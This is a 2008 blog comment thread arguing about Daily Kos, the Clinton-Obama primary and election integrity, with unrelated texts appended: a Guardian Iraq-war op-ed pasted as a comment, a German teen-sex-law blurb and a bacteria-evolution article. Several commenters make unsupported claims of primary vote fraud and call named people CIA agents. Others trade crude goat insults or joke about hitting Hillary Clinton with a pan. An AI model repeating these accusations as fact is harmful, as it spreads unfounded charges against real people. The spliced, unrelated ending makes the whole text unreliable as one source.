... Floridiot said on 3/16/2008 @ 4:08 pm PT ...
Tumor LOL
No , what I think he sees is that his kids are falling behind big time and do not have the same opportunities that he did .
And he now realizes that what we had back then ( before Reagan ) worked
COMMENT # 50 [ Permalink ]
... Agent 99 said on 3/16/2008 @ 4:25 pm PT ...
So can we have Republican Socialists now ?
Democratic Socialists have failed , thus far , to improve things ....
COMMENT # 51 [ Permalink ]
... Judith said on 3/16/2008 @ 4:29 pm PT ...
I read DK and find it very enjoyable .
If the Clinton whiners do n't like it - go somewhere else .
Seems to me they are always trying to " make someone pay " for not carrying their water .
COMMENT # 52 [ Permalink ]
... Agent 99 said on 3/16/2008 @ 4:34 pm PT ...
Actually , Flo , what works , what has proven itself completely workable , is high quality public education , a fully - functioning fourth estate and election integrity .
I think things went off the rails with the McCarthy hearings , and Reagan just dealt the crowning blows .
COMMENT # 53 [ Permalink ]
... Agent 99 said on 3/16/2008 @ 4:51 pm PT ...
I JUST TORE OUT ALL MY HAIR !
I 'd like to bash Hillary with a cast iron pan right now .
COMMENT # 54 [ Permalink ]
... pat driscoll said on 3/16/2008 @ 5:08 pm PT ...
the rot set in at dkos early on .
after the fraudulent elections of 2000 and 2004 , fraud - which no doubt existed earlier but which was made more evident by the wonders of the internet - kossacks spent more time vilifying bev harris than actively working to have the elections cleaned up .
as an outsider , it amazed me that so many dem websites failed to have links to bradblog , votersunite etc. however , i was still amazed at how completely new , dubious posters took over dkos when this endless election cycle began .
incredibly , dkos became indistinguishable from drudge and the corpmedia , who were giving obama a free pass while dredging up the anti-clinton stuff that had been the staple of drudge and the corpmedia for nearly two decades .
the corpmedia - the real enemy - were determined however to frame the entire dem candidacy as between obama / clinton , which was not in the interest of the dem party , as i saw it .
personally i think john edwards would have been a more unifying choice , given al gore clearly understood americans were not yet ready for him , or for doing the necessary things to obviate the worst impacts of partly human - induced climate change .
what was ridiculous was the way dkos and other such dem websites would attack clinton all day , yet not allow any scrutiny of obama .
his church was always going to be his achilles heel , yet the corpmedia would n't touch on it til now .
why was that ?
obviously , they waited til the ' maths ' favoured obama .
at this point , mccain is probably destined to be the next president .
shame .
now there is the hilarity of seeing rightwing libertarian websites which are banned from even being mentioned on dkos and other websites , backing obama .
u have to laugh .
go to bbc , murdoch press outside the US , and other world newspapers in the past few days , and u still wo n't see coverage of the obama / pastor / rezko stories .
yet , up until now , the world press has been having a pro obama or anti clinton story on their homepages on a daily basis .
the world had to put up with the corpmedia 's assassination of the clintons for the entire duration of the clinton presidency and beyond , so it hardly made sense that she should come under so much scrutiny and sensationalised reporting on the most minor details of her campaign , yet people were voting for obama without knowing a thing about him , due to the corpmedia 's failure to cover what was easily known long before now .
british journo nick davies has a book out called ' flat earth news ' and had this to say recently on australian abc radio : Feb 2008 : ABC Australia : Media Report : Journalists and their information
Interview with the Guardian 's Nick Davies , who has a new book called ' Flat Earth News ' .
Nick Davies :
It 's because in the background , ownership of newspapers on the whole has moved from the old family firms that were run by some pretty crap people , like William Randolph Hearst in the States , or Lord Beaverbrook , you know , propagandists .
It 's moved from those into the hands of big corporations , and they understandably enough want to make money .
So they slowly cut our staff and they 've increased our outputs , all the newspapers have masses of supplements and broadcasting goes 24 hours around the clock , and again , my specialist researchers from Cardiff University did a lot of number crunching about this , and as a crude underlying trend , they 're saying in British national newspapers , reporters are filling three times as much space as they used to 20 years ago .
So story by story , they only have a third of the time , yet when you follow that through into particular stories like the weapons of mass destruction where almost everything we told you was wrong , most of the scandal around Bill Clinton , what we told you was wrong , the millennium bug , do you remember that ?
We got almost all of that wrong , all around the planet .
And then the little stories that just flow through the newspapers , they 're just there for 24 hours and then fade away ; so many of them are false , so many of them are distorted .
It 's really quite scary .
http://www.abc.net.au/rn...stories/2008/2166826.htm
it would be interesting to know if much of what was written and broadcast about the clintons was ' wrong ' .
after all , we did n't have the internet at full bloom in those days to help us make up our own minds .
what i do know is dkos and other dem websites caused americans to vote for obama who would never have voted for him had they known what they are beginning to know now .
that is so dishonest as those people cannot get back their votes .
one example of the corpmedia 's bias is mentioned on abc today , where it also mentions film of obama in wright 's church during a ' fiery ' sermon is about to surface ( no surprise ) : 15 March : ABC : Jake Tapper : Just What Did Obama Know About Wright 's Past Sermons ?
In a phone call with Wright , Obama cited a Rolling Stone story , “ The Radical Roots of Barack Obama , " ( the name of which has curiously been changed on the RS website ) and told him , according to Wright , “ You can get kind of rough in the sermons , so what we ’ve decided is that it ’s best for you not to be out there in public . ”
http://blogs.abcnews.com.../03/just-what-did-o.html " rolling stone " changed that headline to " destiny 's child " .
no prizes for guessing why .
COMMENT # 55 [ Permalink ]
... TruthIsAll said on 3/16/2008 @ 5:11 pm PT ...
The 2008 Primaries : Statistical Footprints of Election Fraud
TruthIsAll http://www.geocities.com...l/2008PrimariesLinks.htm
Mar. 15 2008
The pattern is very clear .
Starting with Clinton ’s New Hampshire primary “ upset ” , there has been an ongoing effort to pad her votes at the expense of Obama .
And no wonder : the Republicans want to run against her and are doing all they can to make it happen .
Even so , Obama currently leads the recorded popular vote by 700,000 .
But he may very well be leading the True Vote by 1,500,000 or more .
That would make a big difference in pledged delegates .
It ’s the ultimate Rovian dirty trick : tear apart the Democratic Party .
Divide and Conquer : it ’s the only way the Republicans can win in November .
And yet the media does n’t investigate the footprints of election fraud .
They want the “ horserace ” to continue .
1 . New Hampshire
The Final pre-election polls ( 3 - 4 % MoE ) gave Obama an average 8 % margin over HRC .
The early ( unadjusted ) exit poll had Obama winning by 8 % .
He won New Hampshire hand - counts by 5.90 % but lost machine - counts by exactly the same margin .
2 . South Carolina
Even though he finished third , Edwards would have done better in the general election than either Clinton or Obama .
3 . Super Tuesday
Just like the 2004 battleground state exit poll red-shift to Bush , 14 of 16 states had a Hillary - shift from the exit poll to the recorded vote .
In New York , over 80 precincts , many in black areas , recorded ZERO votes for Obama .
Mayor Bloomberg called it fraud .
In Los Angeles , 90,000 independent votes were uncounted due to the confusing ballot design ( shades of the Florida 2000 “ Butterfly ” ) .
4 . Ohio
Clinton 's vote share exceeded her 9 pm exit poll share by 3.6 % ( 55.2-51.6 % ) .
She won the recorded vote by 10.6 % ( 55.3 - 44.7 % ) over Obama .
But her exit poll margin was just 3.4 % ( 51.7-48.3 % ) .
As is always the case , the Final Exit Poll was adjusted to match the vote count .
Seventeen thousand Republicans followed Rush Limbaugh ’s advice in Cuyahoga County and crossed over to vote for Clinton .
5 . Primaries , Caucuses and Exit Polls
Obama is doing better in the primaries than the recorded votes indicate .
But that ’s not unexpected ; it ’s always the fate of the progressive candidate to fare better in the exit polls than in the vote count .
He also does much better in human - counted caucuses than machine - counted primaries ( see Texas ) .
He leads Clinton by 700,000 votes in primaries ( 49.5 - 46.9 % ) and by 66.3 - 33.7 % in caucuses .
If exit polls rather than recorded votes are counted , Obama would be leading by 1.6 million votes .
In Texas , there was a strange , impossible result : Zero votes were cast for Republicans in 21 counties ( all 36,239 ballots cast were for Democrats ) .
There were zero votes cast for Democrats in 3 counties ( all 1865 ballots cast were for Republicans ) .
Did Republicans follow Rush Limbaugh ’s advice and cross over to vote for Clinton ?
We can assume that crossovers , even if not 100 % , occurred in other counties .
In Mississippi , Obama won by 61 - 37 % , but 25 % of Clinton ’s votes came from Republicans who followed the advice of Rush Limbaugh .
Obama won 65 % of Democrats and Independents .
COMMENT # 56 [ Permalink ]
... Easterling said on 3/16/2008 @ 5:45 pm PT ...
I was troll rated off of Daily Kos a couple years ago .
Death Sentence for repeatedly asking why would a supposed democrat i.e. Hillary Clinton vote FOR the Iraq War ?
DailyKos is everything that is NOT America and everything that IS a fascist dictatorship .
The 1st amendment only applies to users who agree 100 % with the ruling politbureau .
You can go from being a trusted user to being troll rated and banned for life in the course of a single day .
A very sad exercise in thought / opinion control .
Daily Kos comes off as totally Orwellian Doublespeak in its efforts to appear neutral and unbiased .
LIVE FREE OR DIE - Easterling
COMMENT # 57 [ Permalink ]
... Floridiot said on 3/16/2008 @ 6:02 pm PT ...
99 # 53 It 's all smoke and mirrors , poll , media and election manipulation anyway .
All you have to do is look
at the voting lines
COMMENT # 58 [ Permalink ]
... socrates said on 3/16/2008 @ 6:34 pm PT ...
After that CIA stuff came out , and with all the mind games over there , is n't it fair to ask whether DailyKos was rigged from the start to have the success it did ?
Is Kos a spook dealing with ideas ?
I am finding it very strange looking at these people 's backgrounds .
If Hertzberg was in the Dept. of Defense , how'd he end up running that now deleted domain Election Science Institute ?
Kos and Anderson Cooper have ties to the CIA ?
Huffington was libertarian / rightwing and Hitchens lefty Progressive , and then they flip - flopped ?
What about Mike Rivero ?
Is he a spook ?
He has said he worked for NASA .
How come his email address as a google forum blogger included jpl and mil ?
As in jetpropulsion laboratory and military ?
With all due respect to Larry Johnson , he is ex-CIA ?
If so , why are we supposed to trust him ?
If he can admit it should be disbanded along with the NSA , then we can talk .
This cointelpro / netvocates / Kos / Rivero / Karl
Rove type crap needs to go .
I think it 's great that Kos has been exposed .
But there is a bigger picture to astroturfing than just him .
Is Michael Rivero a spook ?
COMMENT # 59 [ Permalink ]
... Paul McCarthy said on 3/16/2008 @ 9:16 pm PT ...
The only time I 've ever looked at Kos was the " darkening Obama 's picture " thing .
I like Obama , but the evidence was just not there .
COMMENT # 60 [ Permalink ]
... frankdawg81 said on 3/17/2008 @ 7:08 am PT ...
Sorry if I ' spin ' HRC 's threshold comment as claiming BHO is not qualified to be CinC but I do n't see how it can be ' spun ' as anything else .
I have never screwed a goat and I know Senator McBush has never screwed a goat but you 'll have to ask Michelle is she has ever screwed a goat .
Yes ma'am I certainly did n't just imply you screwed goats , just like HRC did n't imply BHO is unqualified .
You attack me as if I am a BHO supported & just like you claim kos does to HRC supporters .
This is how these silly wars start .
COMMENT # 61 [ Permalink ]
... medicis said on 3/17/2008 @ 7:51 am PT ...
Given Markos ' connection to the CIA , I have always viewed dKos as a way to get an idea of what disinfo the CIA wanted me to swallow .
It has never had any credibility for me .
COMMENT # 62 [ Permalink ]
... Floridiot said on 3/17/2008 @ 8:20 am PT ...
My name is Neil Horsley , and I screw goats
COMMENT # 63 [ Permalink ]
... Paul McCarthy said on 3/17/2008 @ 9:33 am PT ...
Oddly enough , Barack Obama is the only presidential candidate I 've ever known anything about .
I 'm from Hawaii and have friends who went to school with him .
They tell me he hung out with the " nerdy smart kids " .
I 'm very familiar with the school , too , kind of a sheltered prep school for bright kids whose parents can afford the tuition .
He probably came to the Mainland knowing next to nothing about " black " culture .
This description of him as this somewhat naiive intellectual type is , I imagine , completely accurate .
Very interesting guy and atypical politician .
COMMENT # 64 [ Permalink ]
... sanitysojourner said on 3/17/2008 @ 9:47 am PT ...
At the risk of being bashed , I want to say some things in defense of dKos .
1 . There are over 150,000 registered users .
Any of them can comment and publish diaries .
The validity of the content is managed , in many ways , by the readers ( not by Kos ) .
That means that both trash and treasure get through .
2 . Many of us , myself included , do n't give a rip about what Markos thinks .
He has his opinions , states them from the hip and many , myself included , have gone 'round the table with him .
He does not own our minds , nor do the front pagers and we are nobody 's minions .
3 . Many of us on the site deplore the current primary vitriol .
We avoid the candidate diaries like the plague .
However , a few have managed to keep those particular diaries ( and the vitriol ) going .
It is indeed hard to say anything positive about Clinton or anything negative about Obama without getting blasted .
Heck , I was blasted when I recently commented that Obama 's oratory had improved !
Several took offense because , in their minds , Obama 's oratory has always been wonderful .
So , I 'm agreeing that less than intelligent discourse can take place there .
But let 's not throw the baby out with the bathwater .
There 's still a lot of good material .
Unfortunately , a lot is being missed with the divisiveness of the various primary camps .
Those of us who have been around a while are hoping that ends soon .
Indeed , some have started labeling their diaries with NACD ( not a candidate diary ) as a refuge for those of us who do n't want to accidentally sink into a candidate diary .
4 . Check out diaries by nyceve who covers health care , bonddad who covers economic issues , and jerome a paris who covers economic and environmental issues .
None of them are front pagers .
They write excellent material .
Diarist like those make up the heart of dKos.
5 . There is a blogroll on the lower right hand front page .
It changes daily .
Each diarist has his / her own blogroll that is displayed in each diary they write .
6 . What makes me saddest is that the vitriol that has been the hallmark of the republicans ( " Yer a terrist sympathizer and unpatriotic --- and probably gay or something " ) has spilled over into the blogosphere in general .
Yes , some holy wars have broken out on dKos , but now the Democratic blogs are fighting each other in the same way .
I have nothing but the highest respect for BradBlog and what Brad has done .
I 've referred to bradblog in my dKos comments , it 's on my blogroll ( and will remain ) , given credit and plugs on dKos for the work done here and have even donated a miniscule amount to this site .
My belief is that the differences between and among us are small .
We do n't need to demonize each other .
dKos is not perfect : it 's big and requires self - policing and is showing the risks inherent in that .
I believe that we would be better off resolving our disagreements and differences ( or overlooking them , assuming they are n't too egregious ) across blogs .
They all have a different purpose .
And please do n't give Markos too much credit for being able to dictate .
Most of us regular non-front pagers laugh hysterically at that concept .
Can we be friends ?
Seriously .
We 're all ( flaws and all ) too important to the democractic process to turn on each other .
We need each other .
COMMENT # 65 [ Permalink ]
... JEANNIE DEAN in FL - 13 said on 3/17/2008 @ 10:44 am PT ...
Great thread !
Truth is All ~( #55 )
Wowwweeee .
Just incredible !
A million gracious thanks for that post .
I 'd love to include some of that info in upcoming vid's ... ( Aside : as I 've been WAY OFF n' WELL OVER DKOS now for a long time when it became clear they would n't allow any REAL election related info / swore off ALTERNET last year after they would n't post ANY relevant to independent 9/11 investigations / had to let go HUFFPO last month when they -- sickens me to recall -- TOLD THEIR READERSHIP TO STOP RESPONDING TO EXIT POLLS !
And Keith Olberman ( and NBC ) is now a bad name in our house after he willingly , knowingly assisted NBC NEWS VP CHUCK TODD 's anti-democratic ban on KUCINICH 's participation in the MSNBC debates .
That being said , I 'm a BRADBLOG / BLACKBOXVOTING / JOHN GIDEON / GREG PALAST / MARK CRISPIN MILLER gal now , all the way and everyday .
Happy to report I 'm much more efficient without spending all my time fighting people who just wanna fight to fight : )
RE : TEXAS -- found out what happened in TEXAS with the NO REPUBLICAN VOTES -- turns out they HAVE NO REPUBLICAN PRIMARY IN THOSE DISTRICTS !
Dates back to post civil war ; strong anti-LINCOLN sentiments throughout rural Texas , no LOCAL REPUBLICAN PARTY EVER ORGANIZED !
Instead , the onus to create , organize , and run a primary election is completely on the citizens in these small districts .
RICHARD HAYS PHILLIPS , author of " WITNESS TO A CRIME " looked into it , and recently released the following : " ... I asked for an explanation , and I received one from David Rogers , an attorney in Austin , Texas , described as a supporter of election integrity ... ... I was startled by the explanation .
It seems that there were no Republican primaries in 21 counties , and no Democratic primaries in three counties .
This would explain the numbers , but it would still be a fact that voters of one party or another are disenfranchised , countywide , in many counties in Texas .
To me , this seemed unacceptable in a democracy .
Rogers replied that , unacceptable or not , this is the most likely explanation for the results I observed .
" Republicans have been disenfranchised like this in Texas for over a century ( in fact , getting the number of no-Republican - primary counties below 25 is a recent and remarkable achievement . ) "
Rogers explained that while ballots , voting machines , and election workers are all paid for by the state government , the local parties at the county level have to bear the costs of administration and accounting ; and they have to find someone to do the paperwork , and somewhere to store the paper .
" The costs in time and money to the parties are n't much , but they are n't nothing . "
" The failure is almost entirely organizational , " Rogers said .
" The state party tries to help the local counties some , so which counties have no party changes some from year to year , but the state party can’t force the locals to organize if they do n’t want to . "
Vickie Karp and Karen Renick just had both men on VOTE RESCUE RADIO , yesterday / fascinating history lesson .
And TRUTH IS ALL , if you have n't seen THIS data , yet -- oh , it 's RIGHT UP YOUR ALLEY !
Mr. Hays Phillips concludes his missive : " For the record , in the 21 counties in which there was no Republican primary last Tuesday , Kerry outpolled Bush by 21,089 to 19,732 in the 2004 presidential election , and Bell ( the Democrat ) outpolled Perry ( the Republican ) by 9,508 to 6,820 in the 2006 gubernatorial election .
In the three counties in which there was no Democratic primary last Tuesday , Bush outpolled Kerry by 3,194 to 456 in 2004 , and Perry outpolled Bell by 1,279 to 208 in 2006 .
The fact that these counties are sparsely populated does not make me feel any better about the disenfranchisement of their voters ... "
COMMENT # 66 [ Permalink ]
... MarkH said on 3/17/2008 @ 2:08 pm PT ...
What a strange time we live in .
First , Obama and his supporters are extremely likely to win , so it would be nice if they could show some class and win graciously .
Oh , and put John Edwards on the ticket as Veep .
That would help unite the party ( and it would make me happy ) .
Second ,
All talk of racism or race should cease , regardless of who said what .
It 's not helping .
Third , " Republican socialists " ?
WTF ?
Fourth , I read yesterday that the Texas primary had something like 2.8 million Democratic voters and that number ( for the primary ! ) is MORE than voted in the 2000 or 2004 general election for Gore or Kerry .
It 's astounding .
Fifth , did I say what a strange time we 're living in ?
I hope everybody has tightened their seatbelts since Wall Street is set for some severe bumpiness .
Blog on !
COMMENT # 67 [ Permalink ]
... Dredd said on 3/17/2008 @ 2:56 pm PT ...
d Kos , Bear Sterns , Amurka , and just about anything based - on - bu$ shit can go away faster than penis cheney gets off on shock and awe .
So hunker down .
COMMENT # 68 [ Permalink ]
... Brad Friedman said on 3/17/2008 @ 2:57 pm PT ...
SanitySojourner # 64 said :
And please do n't give Markos too much credit for being able to dictate .
Most of us regular non-front pagers laugh hysterically at that concept .
Trouble is , the media folks out there ( CMSM types ) do not laugh at Markos or his front - pagers , and allow their dangerous agenda , set on that front page , to dictate how the supposedly " Progressive " blogosphere is reacting to any one thing or another .
In the bargain --- and if you know my beef with dKos , you already know this --- the overly powerful voice of Markos and his front pagers has been used to help marginalize issues of Election Integrity .
If they wish to downplay such things , so be it .
If they wish to ban and purge users for discussing them , that 's horrible .
If they wish to post disinformation and inaccurate points about the fight , I 've got a real problem with that .
Can we be friends ?
Seriously .
We 're all ( flaws and all ) too important to the democractic process to turn on each other .
We need each other .
I have met Markos once in my life , and have been friendly with him .
My beef is not a personal one , it is a professional one , and one which I believe I have used facts to bear out .
On this " writers / readers strike " business , as stated in my original post , I do n't particularly have an opinion , since I do n't follow dKos due to the above for the most part .
But as a blog owner , I though I could advance the story a bit by sharing what it is that * really * gets the attention of blog owners , and that is changes in traffic .
If folks want to take action against dKos , that 's how it can be done most effectively ( same action can also be used against The BRAD BLOG , btw , if one wishes ) .
If they do n't , that 's up to them as well .
It is remarkable , however , that folks on the ( theoretically ) same side of the political spectrum have n't figured out how to debate respectfully .
Apparently what many Dems seem to have learned from 8 years of Karl Rove is that they should behave exactly like him .
I think such folks have missed the point .
Big time .
COMMENT #69 [ Permalink ]
... frankdawg81 said on 3/18/2008 @ 7:23 am PT ...
as if to rad my mind Tom Tomorrow has this great piece : http://www.salon.com/com...cs/tomo/2008/03/17/tomo/
Number of days without screwing a goat : 63 8-{>
COMMENT # 70 [ Permalink ]
... Michelle said on 3/18/2008 @ 11:47 am PT ...
frankdawg81 ,
If you saw an attack , maybe you need glasses , or a new monitor .
Whatever you have to do to rationalize your own specious attacks , right ?
COMMENT # 71 [ Permalink ]
... teknikAL said on 3/18/2008 @ 12:42 pm PT ...
I have been boycotting DKoS for sometime as well .
My ability to log in and comment was taken away after I made a series of comments about election integrity .
I checked back recently , after sending emails over time and getting no reply , and was allowed to log in but not comment .
At that time I was " banned " ( around the end of last year ) the atmosphere was very pro Hillery and the Obama people were getting the smack down , I might add abusive smack downs .
Nice to see them get some of the same back .
I guess the momentum has carried Obama ( and continues ) and overwhelmed the Kossacs .
COMMENT # 72 [ Permalink ]
... DES said on 3/18/2008 @ 1:47 pm PT ...
Michelle , I think most reasonable people would see phrases like this as an attack rather than a reasoned disagreement with another person 's opinion : " Way to spin , that 's NOT what she said . "
" A flippant remark ?
Yes , but in no way giving McCain any credit beyond what she believes he will say .
Context is a bitch , ai n't it ? "
Snot and snark are fine , but it is disingenuous to act innocent when you 're called on it --- your opinion can stand on its own without having to bash another 's ( genuinely felt ) understanding or opinion .
Capiche ? # 64 Sanity SoJourner ---
I have found many , many non-candidate diaries over at kos to be infected with the same poisonous vitriol , and I just do n't have time anymore to wade through the giant blob of quivering , feverish , childish attacks to find them .
Be careful about mentioning Brad Blog over there --- you 're very likely to be troll - rated , treated as a ' nutter ' , or otherwise labeled a ' conspiracy theorist ' .
Anyone who does n't enthusiastically echo the kos hive mind becomes a target .
They also seem to have a problem with reading comprehension over there --- unable to discern the difference between explicit statements vs. what they have inferred ... i.e. , what they thought they read vs. what was actually said .
They routinely abuse their own rules for troll - rating and flaming other commenters , especially the front - pagers .
And even now , it would appear that many of them ( including Markos himself ) seem to have missed the whole point of the strike / boycott --- this has nothing whatsoever to do with any candidate and EVERYTHING to do with them and their irresponsible --- and stupid --- behavior .
They have become what they despised --- little leftwing nuts , just as bad as their freeper counterparts .
Maybe the place will return to some semblance of sanity , maybe not .
I only know that it is a waste of time for me to go there for the foreseeable future .
I guess I thought progressives were better than that .
COMMENT # 73 [ Permalink ]
... LanceThruster said on 3/18/2008 @ 4:28 pm PT ...
" I 'm not a member of any organized political party , I'm a Democrat ! " - ---
Will Rogers
In poking around the intertubes on this particular issue , I 've noticed many almost identical pro-HRC comments with different names attached to them .
I saw a somewhat similar thing with many rabid HRC posters at HuffPo ( before I was banned for life there ) who had only recently arrived making nearly identicle comments .
The example here is what BEES ( # 2 ) said above is almost exactly what someone named Alegre ( a " ringleader " of the walk - out ) said over at the Atlantic , and elsewhere .
It is clear ( to me at least ) that HRC operatives and her proxies are out doing their Rovian dirty work .
The memes being planted are that " Obama is toast " to " He has committed political suicide " heard on H&C , Bill Handle ( KFI 640 am - Los Angeles ) , and several callers in a row to Stephanie Miller ( KTLK 1150 am - Los Angeles ) .
It sounds as if the marching orders have been sent and the Mighty Wurlitzer of the MSM is doing its part .
Thanks for all you do , Brad .
Keep up the great work .
COMMENT # 74 [ Permalink ]
... Easterling said on 3/21/2008 @ 1:48 pm PT ...
When I first started posting on DailyKos I paid $ 100.00 lifetime membership fee .
First time I posted something that the trusted users found out of bounds I was troll rated off to oblivion .
I had been a trusted user at that time .
So I asked for my $ 100.00 lifetime membership dues be refunded .
It took several " I will sue you ass " type emails and a report to the New York Attorney General 's office before I finally received an email from the mighty Kos stating that my $ 100.00 lifetime Daily Kos membership dues would be refunded forthwith .
DailyKos ' boundries are the same boundries set by the FBI , CIA , and MSM .
These boundries amazingly are the same boundries observed by MSM , Olberman , Mahar , Stewart et all .
Never question or mention 9/11 commission findings for the government always speaks truth .
Ya really , hey Kos and all you shill troll Kossacs out there .
Hope your BO$ $ is paying you well for selling your souls and selling out your country .
Eat it Kos you traitor !
LIVE FREE OR DIE
COMMENT # 75 [ Permalink ]
... Easterling said on 3/21/2008 @ 3:50 pm PT ...
Check out this info about MarKos and google for more ; http://truth-about-kos.b...amily-and-pollution.html
COMMENT # 76 [ Permalink ]
... socrates said on 3/21/2008 @ 9:30 pm PT ...
It 's over for Kos .
File under netvocate like activities .
http://www.cybersoc.com/netvocates/index.html
Here 's another one .
Enjoy .
Bob Parsons of Go-Daddy.com , another cheese - whiz .
I do n't think this link is easy to find on google .
People and institutions are n't playing fair .
Kos is a low level clerk for the cia .
He was a dumbass for not covering up his roots better .
This is one of the coolest links I ever read .
http://cloggie.org/progg...e-day-whos-your-godaddy/
COMMENT # 77 [ Permalink ]
... Joseph David Chase II said on 5/19/2008 @ 8:13 pm PT ...
The Iraq war has shown how high is the pain threshold of the west .
Five years after the 2003 invasion , the daily roll call of Iraqi suicide bombings , murders , firefights and body - bags has become as familiar a part of our landscape as traffic jams on the M1 and Los Angeles freeway .
The media class on both sides of the Atlantic is deeply engaged , indeed impassioned .
The war is much discussed in the US presidential election campaign .
But most Americans and Europeans display vastly less interest in the Middle East than in troubles closer to home - the global banking crisis foremost among them .
They have grown used to Iraq in the way they do to a chronic personal ailment .
It is there .
It is nasty .
They wish that it would go away .
But it does not inflict the sort of agonising pain that causes democracies to force urgent action upon their governments .
At this week 's bleak anniversary , statisticians measure the cost .
Joseph Stiglitz and Linda Bilmes tell us that the US faces a total bill of $ 3 trillion , and still counting .
About 4,000 American soldiers , 171 British and anything between 200,000 and 600,000 Iraqis have died .
It would be madness to describe these numbers as acceptable .
But they have not proved so unacceptable that the US or British government , or even the Iraqi administration in Baghdad , has found it necessary to adopt any radical shift of policy .
The Shia - dominated government of Nouri al - Maliki still recoils from empowering Iraq 's Sunnis .
The Bush administration declines to make serious advances to Iran and Syria , vital players in any credible Iraqi outcome , or to qualify its unstinting support for Israel .
Gordon Brown maintains a token British contingent outside Basra , which does little , but avoids an outright breach with Washington .
It seems futile , five years on , to waste words rehearsing once more the folly of the invasion , launched under false pretences , on the basis of WMD evidence that some of us , including me , were foolish enough to swallow .
Likewise , the blunders of the early occupation are common ground even in sentient zones of the White House .
All that matters now are the present and future .
George Bush 's troop surge has been a tactical military success .
Though violence in February and March has increased from the low January level , with 10 US soldiers dying last week , far fewer Iraqi lives are being lost than at this time last year .
Local ceasefires have made notable progress , with militias receiving American pay to refrain from attacks on either US forces or other factions .
Al - Qaida insurgents have suffered repeated military defeats , and political eclipse .
Many Sunni communities have rejected al - Qaida 's murderous hegemony , together with the cost of allowing their towns and villages to become battlefields .
The great unanswered question is whether this amounts to sustainable progress , or merely to a temporary hiatus which fails to address the fundamental issues that will decide Iraq 's future .
Dr Stephen Biddle of the US Council on Foreign Relations has acquired an intimate knowledge of Iraq , and offered an interesting assessment to the House armed services committee in January .
While accepting that all the options remain bleak , he suggested that there is today a better chance of salvaging something than seemed possible six months ago .
He argued that a long - term US peacekeeping commitment - perhaps for 20 years - remains essential .
" We are the only plausible candidate for this role for now - no one else is lining up to don a blue helmet and serve in a UN mission to Iraq , " he said .
" We are not widely loved by Iraqis ...
Yet we are the only party to today 's conflict that no other party sees as a threat of genocide ... we are tolerated across Iraq today in a way that is unique among the parties . "
Biddle cherishes no delusions about the weakness , approaching paralysis , of the national government in Baghdad .
The Shia prime minister , Maliki , he says , can more readily live with continuing war than address the political challenges of reconciliation and compromises with the Sunnis , which peace would render inescapable .
Instead , he suggests that " a patchwork quilt of uneasy local ceasefires " may be attainable , with adjoining areas run by local Sunni and Shia militias , and essential services provided by trusted co-religionists .
All this fits with the bottom - up rather than top - down approach that has been at the heart of General David Petraeus 's strategy since he assumed command in Baghdad .
Yet massive uncertainties overhang the vision propounded by Biddle and others .
Will the local ceasefires and reduction of violence be maintained , as US troop numbers on the ground inevitably decline ?
Can intercommunal stresses , not least with the Kurds , be contained while the key issue of dividing oil revenues remains unresolved ?
And whoever becomes president in January , will the American people be willing to sacrifice the blood and treasure involved in a long - term troop commitment to Iraq ?
Whether McCain , Obama or Clinton reaches the White House , each will face the same dilemma : would any of the three accept responsibility for presiding over a possible bloodbath , if he or she gives an order to bring the boys home ?
A familiar tension will persist , between the visible cost of staying , and the huge unknown of getting out .
If violence on the ground seems containable , if the present flickering candle - flames of optimism remain unextinguished , the next president seems likely to persevere in Iraq .
If , on the other hand , pain increases , bloodshed worsens , then the American people will surely force the hand of the White House , and insist upon a closure .
No American general is likely to accomplish more than Petraeus .
Current US political strategy in Iraq is probably as enlightened as it is going to get .
The big , empty field is that of wider American policy in the Middle East , which is critical in determining the context in which Iraq 's fate will be decided .
Under Bush , this has been sterile .
In theory at least , a big opportunity awaits a new president - that of making a new start with Iran , Syria , Saudi Arabia and Israel .
The British historian Professor Hew Strachan , one of my heroes among academics , has for years deplored the west 's failure to act abroad in accordance with a plausible framework of strategy .
We will dismiss the Washington neocons ' claim , underpinning the 2003 Iraq invasion , that their campaign to bring democracy to the Middle East represented just such an overarching idea .
What is needed is informed particularism in place of ignorant universalism .
The challenge for the next US administration is to create a new Middle East strategy that rejects the juvenile Bush vision of Iraq as a playing field against al - Qaida ; which reaches out to moderate Iranians ; and which accepts that until there is justice for the Palestinians , American mood music can never play right anywhere in the Muslim world .
The Iraq experience has laid bare the limits of raw military power .
It would be naive to suggest that an abrupt American departure would now promise the country a happy future .
But there seems no purpose in a continued US military presence , save within the context of new regional policies vastly different from those that prevail today .
comment@theguardian.com
No Prison for Dating Teen Sex Wo n't Be Criminalized in Germany
Germany 's grand coalition government has watered down sex crime legislation following fierce criticism that its original plans would punish teen sex rather than protect young people .
The new law would still punish adults for abusing minors .
Campylobacter cells clump together in a false - color electron microscope image .
Human activities might be responsible for the rapid convergence of two different species of the bacteria .
Like lovers reunited after a cruel world tore them apart , two species of bacteria have found each other in the guts of domestic livestock and are becoming one .
Campylobacter jejuni and Campylobacter coli , as the intestinal organisms are known , are n't just consummating their microscopic love by exchanging genes — they 're merging into a single species , scientists say .
The researchers think the marriage of the creatures represents a profound example of how people can affect evolution .
" What we 're seeing here is hybridization , and it's only been recently acknowledged as an important part of evolution , " said Samuel Sheppard , an evolutionary microbiologist at Oxford University in the United Kingdom .
" It 's really exciting stuff . "
Sheppard and his colleagues detail their findings today in an advance online version of the April 11 issue of the journal Science .
The team reached their conclusions by analyzing DNA , or genetic information , from the bacteria found inside both wild and farm animals .
Ancient split
C. jejuni and C. coli are thought to have shared a common ancestor , or parent , in the ancient past .
When the microbial descendent split up and evolutionary pressures stepped in , two new species began to take shape and fill different niches within the guts of wild chickens , pigs and other animals .
Although the definition of a species is one of the most hotly debated topics among biologists , Sheppard said the two microbes are strikingly different , despite sharing about 85 percent of their genetic code .
" Chimpanzees and humans are known to be about 98 percent genetically similar , so the bacteria 's converging toward becoming a single species , as we think , is pretty impressive , " Sheppard told LiveScience .
" That 's a big genetic gulf to leap .
Maybe like a lobster mating with a fly . "
Sheppard said the bacteria likely began reversing their growing divergence , or genetic separation , when human agriculture came along .
Under pressure
He thinks the bacterial merger has accelerated in recent years , as the world has become more industrialized and the demand for food has prompted crowded farms .
" We 're now really packing a bunch of livestock together , and so the bacterial environment is changed , " Sheppard said .
He noted that chickens often mistake their feathered friends ' poop for food — and that creates a consistent , rapid way of mixing of two intestinal organisms that were once ecologically separated .
" By altering their environment , we 're altering the bacteria , their very being , " he said .
Sheppard explained that bacteria try and most often fail to trade genes , but when two descendants from the same parent meet and then mate , he said , the chance of successfully trading genes gets a big boost .
He could n't say when the two life forms might finally merge , but thinks evolutionary pressures created by humans will surely speed things up .
